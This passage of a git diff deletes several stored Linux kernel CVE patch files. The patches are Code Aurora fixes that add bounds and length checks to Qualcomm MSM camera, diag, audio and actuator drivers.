- 	int reg = (instr >> 12) & 15;
- 	if (reg == 15)
- 		return 1;
--	regs->uregs[reg] = current_thread_info()->tp_value;
-+	regs->uregs[reg] = current_thread_info()->tp_value[0];
- 	regs->ARM_pc += 4;
- 	return 0;
- }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9871/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9871/ANY/0001.patch
deleted file mode 100644
index a777f848..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9871/ANY/0001.patch
+++ /dev/null
@@ -1,146 +0,0 @@
-From f615e40c706708f74cd826d5b19c63025f54c041 Mon Sep 17 00:00:00 2001
-From: Seemanta Dutta <seemanta@codeaurora.org>
-Date: Tue, 23 Jul 2013 15:52:22 -0700
-Subject: msm: camera: Fix potential memory overflow errors
-
-Fix potential memory overflow errors in msm_isp_util.c which happen
-under certain rare conditions.
-
-CRs-fixed: 514717
-Change-Id: I8c70e089df9bf1e7a364c5c8264b782c9c23bf0b
-Signed-off-by: Seemanta Dutta <seemanta@codeaurora.org>
----
- .../platform/msm/camera_v2/isp/msm_isp_util.c      | 47 +++++++++++++++++++---
- .../platform/msm/camera_v2/isp/msm_isp_util.h      |  2 +-
- 2 files changed, 43 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index 3806213..9b9c5a3 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -366,7 +366,7 @@ long msm_isp_ioctl(struct v4l2_subdev *sd,
- 		break;
- 	case VIDIOC_MSM_ISP_SET_SRC_STATE:
- 		mutex_lock(&vfe_dev->core_mutex);
--		msm_isp_set_src_state(vfe_dev, arg);
-+		rc = msm_isp_set_src_state(vfe_dev, arg);
- 		mutex_unlock(&vfe_dev->core_mutex);
- 		break;
- 	case VIDIOC_MSM_ISP_REQUEST_STATS_STREAM:
-@@ -410,7 +410,7 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		if (resource_size(vfe_dev->vfe_mem) <
- 			(reg_cfg_cmd->u.rw_info.reg_offset +
- 			reg_cfg_cmd->u.rw_info.len)) {
--			pr_err("%s: Invalid length\n", __func__);
-+			pr_err("%s: VFE_WRITE: Invalid length\n", __func__);
- 			return -EINVAL;
- 		}
- 		msm_camera_io_memcpy(vfe_dev->vfe_base +
-@@ -422,16 +422,37 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 	case VFE_WRITE_MB: {
- 		uint32_t *data_ptr = cfg_data +
- 			reg_cfg_cmd->u.rw_info.cmd_data_offset/4;
-+
-+		if ((UINT_MAX - sizeof(*data_ptr) <
-+					reg_cfg_cmd->u.rw_info.reg_offset) ||
-+			(resource_size(vfe_dev->vfe_mem) <
-+			reg_cfg_cmd->u.rw_info.reg_offset +
-+			sizeof(*data_ptr))) {
-+			pr_err("%s: VFE_WRITE_MB: Invalid length\n", __func__);
-+			return -EINVAL;
-+		}
- 		msm_camera_io_w_mb(*data_ptr, vfe_dev->vfe_base +
- 			reg_cfg_cmd->u.rw_info.reg_offset);
- 		break;
- 	}
- 	case VFE_CFG_MASK: {
- 		uint32_t temp;
-+		if (resource_size(vfe_dev->vfe_mem) <
-+				reg_cfg_cmd->u.mask_info.reg_offset)
-+			return -EINVAL;
- 		temp = msm_camera_io_r(vfe_dev->vfe_base +
- 			reg_cfg_cmd->u.mask_info.reg_offset);
-+
- 		temp &= ~reg_cfg_cmd->u.mask_info.mask;
- 		temp |= reg_cfg_cmd->u.mask_info.val;
-+		if ((UINT_MAX - sizeof(temp) <
-+					reg_cfg_cmd->u.mask_info.reg_offset) ||
-+			(resource_size(vfe_dev->vfe_mem) <
-+			reg_cfg_cmd->u.mask_info.reg_offset +
-+			sizeof(temp))) {
-+			pr_err("%s: VFE_CFG_MASK: Invalid length\n", __func__);
-+			return -EINVAL;
-+		}
- 		msm_camera_io_w(temp, vfe_dev->vfe_base +
- 			reg_cfg_cmd->u.mask_info.reg_offset);
- 		break;
-@@ -443,8 +464,10 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		uint32_t *hi_tbl_ptr = NULL, *lo_tbl_ptr = NULL;
- 		uint32_t hi_val, lo_val, lo_val1;
- 		if (reg_cfg_cmd->cmd_type == VFE_WRITE_DMI_64BIT) {
--			if (reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
--				reg_cfg_cmd->u.dmi_info.len > cmd_len) {
-+			if ((UINT_MAX - reg_cfg_cmd->u.dmi_info.hi_tbl_offset <
-+						reg_cfg_cmd->u.dmi_info.len) ||
-+				(reg_cfg_cmd->u.dmi_info.hi_tbl_offset +
-+				reg_cfg_cmd->u.dmi_info.len > cmd_len)) {
- 				pr_err("Invalid Hi Table out of bounds\n");
- 				return -EINVAL;
- 			}
-@@ -528,6 +551,12 @@ static int msm_isp_send_hw_cmd(struct vfe_device *vfe_dev,
- 		uint32_t *data_ptr = cfg_data +
- 			reg_cfg_cmd->u.rw_info.cmd_data_offset/4;
- 		for (i = 0; i < reg_cfg_cmd->u.rw_info.len/4; i++) {
-+			if ((data_ptr < cfg_data) ||
-+				(UINT_MAX / sizeof(*data_ptr) <
-+				 (data_ptr - cfg_data)) ||
-+				(sizeof(*data_ptr) * (data_ptr - cfg_data) >
-+				 cmd_len))
-+				return -EINVAL;
- 			*data_ptr++ = msm_camera_io_r(vfe_dev->vfe_base +
- 				reg_cfg_cmd->u.rw_info.reg_offset);
- 			reg_cfg_cmd->u.rw_info.reg_offset += 4;
-@@ -545,6 +574,11 @@ int msm_isp_proc_cmd(struct vfe_device *vfe_dev, void *arg)
- 	struct msm_vfe_reg_cfg_cmd *reg_cfg_cmd;
- 	uint32_t *cfg_data;
- 
-+	if (!proc_cmd->num_cfg) {
-+		pr_err("%s: Passed num_cfg as 0\n", __func__);
-+		return -EINVAL;
-+	}
-+
- 	reg_cfg_cmd = kzalloc(sizeof(struct msm_vfe_reg_cfg_cmd)*
- 		proc_cmd->num_cfg, GFP_KERNEL);
- 	if (!reg_cfg_cmd) {
-@@ -856,11 +890,14 @@ void msm_isp_do_tasklet(unsigned long data)
- 	}
- }
- 
--void msm_isp_set_src_state(struct vfe_device *vfe_dev, void *arg)
-+int msm_isp_set_src_state(struct vfe_device *vfe_dev, void *arg)
- {
- 	struct msm_vfe_axi_src_state *src_state = arg;
-+	if (src_state->input_src >= VFE_SRC_MAX)
-+		return -EINVAL;
- 	vfe_dev->axi_data.src_info[src_state->input_src].active =
- 	src_state->src_active;
-+	return 0;
- }
- 
- int msm_isp_open_node(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.h b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.h
-index 34b9859..9d9558a 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.h
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.h
-@@ -64,7 +64,7 @@ int msm_isp_cal_word_per_line(uint32_t output_format,
- 	uint32_t pixel_per_line);
- int msm_isp_get_bit_per_pixel(uint32_t output_format);
- irqreturn_t msm_isp_process_irq(int irq_num, void *data);
--void msm_isp_set_src_state(struct vfe_device *vfe_dev, void *arg);
-+int msm_isp_set_src_state(struct vfe_device *vfe_dev, void *arg);
- void msm_isp_do_tasklet(unsigned long data);
- void msm_isp_update_error_frame_count(struct vfe_device *vfe_dev);
- void msm_isp_process_error_info(struct vfe_device *vfe_dev);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9872/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9872/ANY/0001.patch
deleted file mode 100644
index d8872c85..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9872/ANY/0001.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From fc787ebd71fa231cc7dd2a0d5f2208da0527096a Mon Sep 17 00:00:00 2001
-From: Katish Paran <kparan@codeaurora.org>
-Date: Fri, 31 Jan 2014 12:00:37 +0530
-Subject: diag: dci: Index DCI client table by client id
-
-Diag driver maintains a table of all DCI clients. This table
-is currently indexed by the PID of the clients. Make changes
-to index the table base on an unique client id.
-
-Change-Id: I57bfab9eae1381882b8eb6270d7ac212e0aaf271
-CRs-fixed: 590721
-Signed-off-by: Katish Paran <kparan@codeaurora.org>
----
- drivers/char/diag/diag_dci.c      | 16 ++++++++++++++++
- drivers/char/diag/diag_dci.h      |  4 ++++
- drivers/char/diag/diagchar_core.c |  4 +++-
- 3 files changed, 23 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/char/diag/diag_dci.c b/drivers/char/diag/diag_dci.c
-index 37c236d..0edfdad 100644
---- a/drivers/char/diag/diag_dci.c
-+++ b/drivers/char/diag/diag_dci.c
-@@ -847,6 +847,22 @@ int diag_process_dci_transaction(unsigned char *buf, int len)
- 	return ret;
- }
- 
-+int diag_dci_find_client_index_health(int client_id)
-+{
-+	int i, ret = DCI_CLIENT_INDEX_INVALID;
-+
-+	for (i = 0; i < MAX_DCI_CLIENTS; i++) {
-+		if (driver->dci_client_tbl[i].client != NULL) {
-+			if (driver->dci_client_tbl[i].client_id ==
-+					client_id) {
-+				ret = i;
-+				break;
-+			}
-+		}
-+	}
-+	return ret;
-+}
-+
- int diag_dci_find_client_index(int client_id)
- {
- 	int i, ret = DCI_CLIENT_INDEX_INVALID;
-diff --git a/drivers/char/diag/diag_dci.h b/drivers/char/diag/diag_dci.h
-index 2ab8a36..870b0f3 100644
---- a/drivers/char/diag/diag_dci.h
-+++ b/drivers/char/diag/diag_dci.h
-@@ -56,6 +56,7 @@ struct dci_pkt_req_entry_t {
- } __packed;
- 
- struct diag_dci_client_tbl {
-+	uint32_t client_id;
- 	struct task_struct *client;
- 	uint16_t list; /* bit mask */
- 	int signal_type;
-@@ -74,6 +75,7 @@ struct diag_dci_client_tbl {
- 
- /* This is used for DCI health stats */
- struct diag_dci_health_stats {
-+	int client_id;
- 	int dropped_logs;
- 	int dropped_events;
- 	int received_logs;
-@@ -119,6 +121,8 @@ int diag_process_smd_dci_read_data(struct diag_smd_info *smd_info, void *buf,
- 								int recd_bytes);
- int diag_process_dci_transaction(unsigned char *buf, int len);
- void extract_dci_pkt_rsp(struct diag_smd_info *smd_info, unsigned char *buf);
-+
-+int diag_dci_find_client_index_health(int client_id);
- int diag_dci_find_client_index(int client_id);
- /* DCI Log streaming functions */
- void create_dci_log_mask_tbl(unsigned char *tbl_buf);
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 9a4e108..0e475c9 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -943,6 +943,8 @@ long diagchar_ioctl(struct file *filp,
- 		for (i = 0; i < MAX_DCI_CLIENTS; i++) {
- 			if (driver->dci_client_tbl[i].client == NULL) {
- 				driver->dci_client_tbl[i].client = current;
-+				driver->dci_client_tbl[i].client_id =
-+							driver->dci_client_id;
- 				driver->dci_client_tbl[i].list =
- 							 dci_params->list;
- 				driver->dci_client_tbl[i].signal_type =
-@@ -1043,7 +1045,7 @@ long diagchar_ioctl(struct file *filp,
- 				 sizeof(struct diag_dci_health_stats)))
- 			return -EFAULT;
- 		mutex_lock(&dci_health_mutex);
--		i = diag_dci_find_client_index(current->tgid);
-+		i = diag_dci_find_client_index_health(stats.client_id);
- 		if (i != DCI_CLIENT_INDEX_INVALID) {
- 			dci_params = &(driver->dci_client_tbl[i]);
- 			stats.dropped_logs = dci_params->dropped_logs;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9873/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9873/ANY/0001.patch
deleted file mode 100644
index d619ae2f..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9873/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From ef29ae1d40536fef7fb95e4d5bb5b6b57bdf9420 Mon Sep 17 00:00:00 2001
-From: Katish Paran <kparan@codeaurora.org>
-Date: Tue, 17 Dec 2013 13:36:15 +0530
-Subject: diag: dci: Safeguard to prevent Integer Underflow and Memory Leak
-
-At certain point in diag driver there can be integer underflow
-thus can lead to memory leak. Added a safeguard for that.
-
-Change-Id: I2a0304f5b9888fe12ca9ef5fbaa9a68ee4ab9c15
-Crs-fixed: 556860
-Signed-off-by: Katish Paran <kparan@codeaurora.org>
----
- drivers/char/diag/diag_dci.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/char/diag/diag_dci.c b/drivers/char/diag/diag_dci.c
-index 7772ebe..414207f 100644
---- a/drivers/char/diag/diag_dci.c
-+++ b/drivers/char/diag/diag_dci.c
-@@ -216,7 +216,11 @@ void extract_dci_pkt_rsp(struct diag_smd_info *smd_info, unsigned char *buf)
- 	if (recv_pkt_cmd_code != DCI_PKT_RSP_CODE)
- 		cmd_code_len = 4; /* delayed response */
- 	write_len = (int)(*(uint16_t *)(buf+2)) - cmd_code_len;
--
-+	if (write_len <= 0) {
-+		pr_err("diag: Invalid length in %s, write_len: %d",
-+					__func__, write_len);
-+		return;
-+	}
- 	pr_debug("diag: len = %d\n", write_len);
- 	tag = (int *)(buf + (4 + cmd_code_len)); /* Retrieve the Tag field */
- 	req_entry = diag_dci_get_request_entry(*tag);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9874/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9874/ANY/0001.patch
deleted file mode 100644
index 31191d4d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9874/ANY/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 56ff68b1f93eaf22e5e0284648fd862dc08c9236 Mon Sep 17 00:00:00 2001
-From: Mohammad Johny Shaik <mjshai@codeaurora.org>
-Date: Thu, 12 Dec 2013 14:26:42 +0530
-Subject: Asoc:msm:Added Buffer overflow check
-
-The overflow check is required to ensure that user space data
-in kernel may not go beyond buffer boundary.
-
-Change-Id: I79b7e5f875fadcaeceb05f9163ae3666d4b6b7e1
-CRs-Fixed: 563086
-Signed-off-by: Mohammad Johny Shaik <mjshai@codeaurora.org>
----
- arch/arm/mach-msm/qdsp6v2/audio_utils.c | 6 ++++++
- sound/soc/msm/qdsp6v2/q6asm.c           | 3 +++
- 2 files changed, 9 insertions(+)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/audio_utils.c b/arch/arm/mach-msm/qdsp6v2/audio_utils.c
-index 2a245f8..b8e55f9 100644
---- a/arch/arm/mach-msm/qdsp6v2/audio_utils.c
-+++ b/arch/arm/mach-msm/qdsp6v2/audio_utils.c
-@@ -23,6 +23,7 @@
- #include <asm/ioctls.h>
- #include "audio_utils.h"
- 
-+#define FRAME_SIZE            (1 + ((1536+sizeof(struct meta_out_dsp)) * 5))
- static int audio_in_pause(struct q6audio_in  *audio)
- {
- 	int rc;
-@@ -258,6 +259,11 @@ long audio_in_ioctl(struct file *file,
- 			rc = -EINVAL;
- 			break;
- 		}
-+		if ((cfg.buffer_size > FRAME_SIZE) ||
-+			(cfg.buffer_count != FRAME_NUM)) {
-+			rc = -EINVAL;
-+			break;
-+		}
- 		audio->str_cfg.buffer_size = cfg.buffer_size;
- 		audio->str_cfg.buffer_count = cfg.buffer_count;
- 		rc = q6asm_audio_client_buf_alloc(OUT, audio->ac,
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 82b92aa9..09c40d6 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -55,6 +55,7 @@
- #define READDONE_IDX_FLAGS 8
- #define READDONE_IDX_NUMFRAMES 9
- #define READDONE_IDX_SEQ_ID 10
-+#define FRAME_NUM             (8)
- 
- /* TODO, combine them together */
- static DEFINE_MUTEX(session_lock);
-@@ -608,6 +609,8 @@ int q6asm_audio_client_buf_alloc(unsigned int dir,
- 			pr_debug("%s: buffer already allocated\n", __func__);
- 			return 0;
- 		}
-+		if (bufcnt != FRAME_NUM)
-+			goto fail;
- 		mutex_lock(&ac->cmd_lock);
- 		buf = kzalloc(((sizeof(struct audio_buffer))*bufcnt),
- 				GFP_KERNEL);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9875/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9875/ANY/0001.patch
deleted file mode 100644
index de34d9da..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9875/ANY/0001.patch
+++ /dev/null
@@ -1,246 +0,0 @@
-From b77c694b88a994d077316c157168c710696f8805 Mon Sep 17 00:00:00 2001
-From: Ravi Aravamudhan <aravamud@codeaurora.org>
-Date: Tue, 4 Jun 2013 10:10:11 -0700
-Subject: diag: dci: Check for request pkt length being lesser than minimum
- length
-
-Added checks for DCI request packets to be greater than the minimum
-packet length. We would drop the request and print an error otherwise.
-
-CRs-Fixed: 483310
-Change-Id: I0d89ded58ee97a08ebe6b06b411ac17d2fcb11df
-Signed-off-by: Ravi Aravamudhan <aravamud@codeaurora.org>
----
- drivers/char/diag/diag_dci.c | 114 ++++++++++++++++++++++++++++++++++---------
- drivers/char/diag/diag_dci.h |   3 ++
- 2 files changed, 93 insertions(+), 24 deletions(-)
-
-diff --git a/drivers/char/diag/diag_dci.c b/drivers/char/diag/diag_dci.c
-index 9b404c6..fa0e9d7 100644
---- a/drivers/char/diag/diag_dci.c
-+++ b/drivers/char/diag/diag_dci.c
-@@ -375,16 +375,23 @@ void diag_dci_notify_client(int peripheral_mask, int data)
- int diag_send_dci_pkt(struct diag_master_table entry, unsigned char *buf,
- 					 int len, int index)
- {
--	int i;
--	int status = 0;
-+	int i, status = 0;
-+	unsigned int read_len = 0;
- 
--	/* remove UID from user space pkt before sending to peripheral */
--	buf = buf + 4;
-+	/* The first 4 bytes is the uid tag and the next four bytes is
-+	   the minmum packet length of a request packet */
-+	if (len < DCI_PKT_REQ_MIN_LEN) {
-+		pr_err("diag: dci: Invalid pkt len %d in %s\n", len, __func__);
-+		return -EIO;
-+	}
- 	if (len > APPS_BUF_SIZE - 10) {
--		pr_err("diag: dci: buffer overwrite possible since payload bigger than buf size\n");
-+		pr_err("diag: dci: Invalid payload length in %s\n", __func__);
- 		return -EIO;
- 	}
--	len = len - 4;
-+	/* remove UID from user space pkt before sending to peripheral*/
-+	buf = buf + sizeof(int);
-+	read_len += sizeof(int);
-+	len = len - sizeof(int);
- 	mutex_lock(&driver->dci_mutex);
- 	/* prepare DCI packet */
- 	driver->apps_dci_buf[0] = CONTROL_CHAR; /* start */
-@@ -395,7 +402,13 @@ int diag_send_dci_pkt(struct diag_master_table entry, unsigned char *buf,
- 		driver->req_tracking_tbl[index].tag;
- 	for (i = 0; i < len; i++)
- 		driver->apps_dci_buf[i+9] = *(buf+i);
-+	read_len += len;
- 	driver->apps_dci_buf[9+len] = CONTROL_CHAR; /* end */
-+	if ((read_len + 9) >= USER_SPACE_DATA) {
-+		pr_err("diag: dci: Invalid length while forming dci pkt in %s",
-+								__func__);
-+		return -EIO;
-+	}
- 
- 	for (i = 0; i < NUM_SMD_DCI_CHANNELS; i++) {
- 		struct diag_smd_info *smd_info = driver->separate_cmdrsp[i] ?
-@@ -449,10 +462,10 @@ int diag_process_dci_transaction(unsigned char *buf, int len)
- {
- 	unsigned char *temp = buf;
- 	uint16_t subsys_cmd_code, log_code, item_num;
--	int subsys_id, cmd_code, ret = -1, index = -1, found = 0, read_len = 0;
-+	int subsys_id, cmd_code, ret = -1, index = -1, found = 0;
- 	struct diag_master_table entry;
- 	int count, set_mask, num_codes, bit_index, event_id, offset = 0, i;
--	unsigned int byte_index;
-+	unsigned int byte_index, read_len = 0;
- 	uint8_t equip_id, *log_mask_ptr, *head_log_mask_ptr, byte_mask;
- 	uint8_t *event_mask_ptr;
- 
-@@ -462,15 +475,24 @@ int diag_process_dci_transaction(unsigned char *buf, int len)
- 		return DIAG_DCI_SEND_DATA_FAIL;
- 	}
- 
-+	if (!temp) {
-+		pr_err("diag: Invalid buffer in %s\n", __func__);
-+	}
-+
- 	/* This is Pkt request/response transaction */
- 	if (*(int *)temp > 0) {
-+		if (len < DCI_PKT_REQ_MIN_LEN || len > USER_SPACE_DATA) {
-+			pr_err("diag: dci: Invalid length %d len in %s", len,
-+								__func__);
-+			return -EIO;
-+		}
- 		/* enter this UID into kernel table and return index */
- 		index = diag_register_dci_transaction(*(int *)temp);
- 		if (index < 0) {
- 			pr_alert("diag: registering new DCI transaction failed\n");
- 			return DIAG_DCI_NO_REG;
- 		}
--		temp += 4;
-+		temp += sizeof(int);
- 		/*
- 		 * Check for registered peripheral and fwd pkt to
- 		 * appropriate proc
-@@ -480,7 +502,12 @@ int diag_process_dci_transaction(unsigned char *buf, int len)
- 		subsys_id = (int)(*(char *)temp);
- 		temp++;
- 		subsys_cmd_code = *(uint16_t *)temp;
--		temp += 2;
-+		temp += sizeof(uint16_t);
-+		read_len += sizeof(int) + 2 + sizeof(uint16_t);
-+		if (read_len >= USER_SPACE_DATA) {
-+			pr_err("diag: dci: Invalid length in %s\n", __func__);
-+			return -EIO;
-+		}
- 		pr_debug("diag: %d %d %d", cmd_code, subsys_id,
- 			subsys_cmd_code);
- 		for (i = 0; i < diag_max_reg; i++) {
-@@ -514,6 +541,12 @@ int diag_process_dci_transaction(unsigned char *buf, int len)
- 			}
- 		}
- 	} else if (*(int *)temp == DCI_LOG_TYPE) {
-+		/* Minimum length of a log mask config is 12 + 2 bytes for
-+		   atleast one log code to be set or reset */
-+		if (len < DCI_LOG_CON_MIN_LEN || len > USER_SPACE_DATA) {
-+			pr_err("diag: dci: Invalid length in %s\n", __func__);
-+			return -EIO;
-+		}
- 		/* find client id and table */
- 		i = diag_dci_find_client_index(current->tgid);
- 		if (i == DCI_CLIENT_INDEX_INVALID) {
-@@ -521,21 +554,33 @@ int diag_process_dci_transaction(unsigned char *buf, int len)
- 			return ret;
- 		}
- 		/* Extract each log code and put in client table */
--		temp += 4;
--		read_len += 4;
-+		temp += sizeof(int);
-+		read_len += sizeof(int);
- 		set_mask = *(int *)temp;
--		temp += 4;
--		read_len += 4;
-+		temp += sizeof(int);
-+		read_len += sizeof(int);
- 		num_codes = *(int *)temp;
--		temp += 4;
--		read_len += 4;
-+		temp += sizeof(int);
-+		read_len += sizeof(int);
-+
-+		if (num_codes == 0 || (num_codes >= (USER_SPACE_DATA - 8)/2)) {
-+			pr_err("diag: dci: Invalid number of log codes %d\n",
-+								num_codes);
-+			return -EIO;
-+		}
- 
- 		head_log_mask_ptr = driver->dci_client_tbl[i].dci_log_mask;
-+		if (!head_log_mask_ptr) {
-+			pr_err("diag: dci: Invalid Log mask pointer in %s\n",
-+								__func__);
-+			return -ENOMEM;
-+		}
- 		pr_debug("diag: head of dci log mask %p\n", head_log_mask_ptr);
- 		count = 0; /* iterator for extracting log codes */
- 		while (count < num_codes) {
- 			if (read_len >= USER_SPACE_DATA) {
--				pr_err("diag: dci: Log type, possible buffer overflow\n");
-+				pr_err("diag: dci: Invalid length for log type in %s",
-+								__func__);
- 				return -EIO;
- 			}
- 			log_code = *(uint16_t *)temp;
-@@ -589,6 +634,12 @@ int diag_process_dci_transaction(unsigned char *buf, int len)
- 		/* send updated mask to peripherals */
- 		ret = diag_send_dci_log_mask(driver->smd_cntl[MODEM_DATA].ch);
- 	} else if (*(int *)temp == DCI_EVENT_TYPE) {
-+		/* Minimum length of a event mask config is 12 + 4 bytes for
-+		  atleast one event id to be set or reset. */
-+		if (len < DCI_EVENT_CON_MIN_LEN || len > USER_SPACE_DATA) {
-+			pr_err("diag: dci: Invalid length in %s\n", __func__);
-+			return -EIO;
-+		}
- 		/* find client id and table */
- 		i = diag_dci_find_client_index(current->tgid);
- 		if (i == DCI_CLIENT_INDEX_INVALID) {
-@@ -596,21 +647,36 @@ int diag_process_dci_transaction(unsigned char *buf, int len)
- 			return ret;
- 		}
- 		/* Extract each log code and put in client table */
--		temp += 4;
--		read_len += 4;
-+		temp += sizeof(int);
-+		read_len += sizeof(int);
- 		set_mask = *(int *)temp;
--		temp += 4;
--		read_len += 4;
-+		temp += sizeof(int);
-+		read_len += sizeof(int);
- 		num_codes = *(int *)temp;
--		temp += 4;
--		read_len += 4;
-+		temp += sizeof(int);
-+		read_len += sizeof(int);
-+
-+		/* Check for positive number of event ids. Also, the number of
-+		   event ids should fit in the buffer along with set_mask and
-+		   num_codes which are 4 bytes each */
-+		if (num_codes == 0 || (num_codes >= (USER_SPACE_DATA - 8)/2)) {
-+			pr_err("diag: dci: Invalid number of event ids %d\n",
-+								num_codes);
-+			return -EIO;
-+		}
- 
- 		event_mask_ptr = driver->dci_client_tbl[i].dci_event_mask;
-+		if (!event_mask_ptr) {
-+			pr_err("diag: dci: Invalid event mask pointer in %s\n",
-+								__func__);
-+			return -ENOMEM;
-+		}
- 		pr_debug("diag: head of dci event mask %p\n", event_mask_ptr);
- 		count = 0; /* iterator for extracting log codes */
- 		while (count < num_codes) {
- 			if (read_len >= USER_SPACE_DATA) {
--				pr_err("diag: dci: Event type, possible buffer overflow\n");
-+				pr_err("diag: dci: Invalid length for event type in %s",
-+								__func__);
- 				return -EIO;
- 			}
- 			event_id = *(int *)temp;
-diff --git a/drivers/char/diag/diag_dci.h b/drivers/char/diag/diag_dci.h
-index 4dc1bfc..d530de9 100644
---- a/drivers/char/diag/diag_dci.h
-+++ b/drivers/char/diag/diag_dci.h
-@@ -24,6 +24,9 @@
- #define DISABLE_LOG_MASK	0
- #define MAX_EVENT_SIZE		512
- #define DCI_CLIENT_INDEX_INVALID -1
-+#define DCI_PKT_REQ_MIN_LEN		8
-+#define DCI_LOG_CON_MIN_LEN		14
-+#define DCI_EVENT_CON_MIN_LEN		16
- 
- 
- /* 16 log code categories, each has:
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9876/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9876/ANY/0001.patch
deleted file mode 100644
index 2ab8feac..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9876/ANY/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 7efd393ca08ac74b2e3d2639b0ad77da139e9139 Mon Sep 17 00:00:00 2001
-From: Mohit Aggarwal <maggarwa@codeaurora.org>
-Date: Thu, 30 May 2013 11:12:39 +0530
-Subject: diag: Fix possible underflow/overflow issues
-
-Add check in order to fix possible integer underflow
-during HDLC encoding which may lead to buffer
-overflow. Also added check for packet length to
-avoid buffer overflow.
-
-Change-Id: I72858e7625764652571aee3154e3c2eb61655168
-CRs-Fixed: 483400
-CRs-Fixed: 483408
-Signed-off-by: Mohit Aggarwal <maggarwa@codeaurora.org>
----
- drivers/char/diag/diagfwd.c | 11 +++++++++--
- 1 file changed, 9 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/char/diag/diagfwd.c b/drivers/char/diag/diagfwd.c
-index 05b2872..baa0a83 100644
---- a/drivers/char/diag/diagfwd.c
-+++ b/drivers/char/diag/diagfwd.c
-@@ -95,7 +95,7 @@ do {									\
- } while (0)
- 
- #define CHK_OVERFLOW(bufStart, start, end, length) \
--((bufStart <= start) && (end - start >= length)) ? 1 : 0
-+((bufStart <= start) && (end - start >= length) && (length > 0)) ? 1 : 0
- 
- /* Determine if this device uses a device tree */
- #ifdef CONFIG_OF
-@@ -1604,8 +1604,15 @@ void diag_process_hdlc(void *data, unsigned len)
- 
- 	ret = diag_hdlc_decode(&hdlc);
- 
-+	/*
-+	 * If the message is 3 bytes or less in length then the message is
-+	 * too short. A message will need 4 bytes minimum, since there are
-+	 * 2 bytes for the CRC and 1 byte for the ending 0x7e for the hdlc
-+	 * encoding
-+	 */
- 	if (hdlc.dest_idx < 4) {
--		pr_err("diag: Integer underflow in hdlc processing\n");
-+		pr_err_ratelimited("diag: In %s, message is too short, len: %d,"
-+			" dest len: %d\n", __func__, len, hdlc.dest_idx);
- 		return;
- 	}
- 	if (ret) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9877/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9877/ANY/0001.patch
deleted file mode 100644
index e9b561ac..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9877/ANY/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From f0c0112a6189747a3f24f20210157f9974477e03 Mon Sep 17 00:00:00 2001
-From: Vasko Kalanoski <vaskok@codeaurora.org>
-Date: Fri, 4 Oct 2013 15:28:34 +0300
-Subject: msm: actuator: fix to prevent untrusted pointer to lead DoS
-
-fix to prevent untrusted userspace pointer in actuator kernel
-driver to lead DoS
-
-Change-Id: I1b64270deb494530d268539e7b420be5ec79b658
-Signed-off-by: Vasko Kalanoski <vaskok@codeaurora.org>
----
- .../msm/camera_v2/sensor/actuator/msm_actuator.c   | 26 +++++++++++++++++-----
- 1 file changed, 20 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index baa2db8..201a011 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -196,11 +196,19 @@ static int32_t msm_actuator_piezo_move_focus(
- 	struct msm_actuator_move_params_t *move_params)
- {
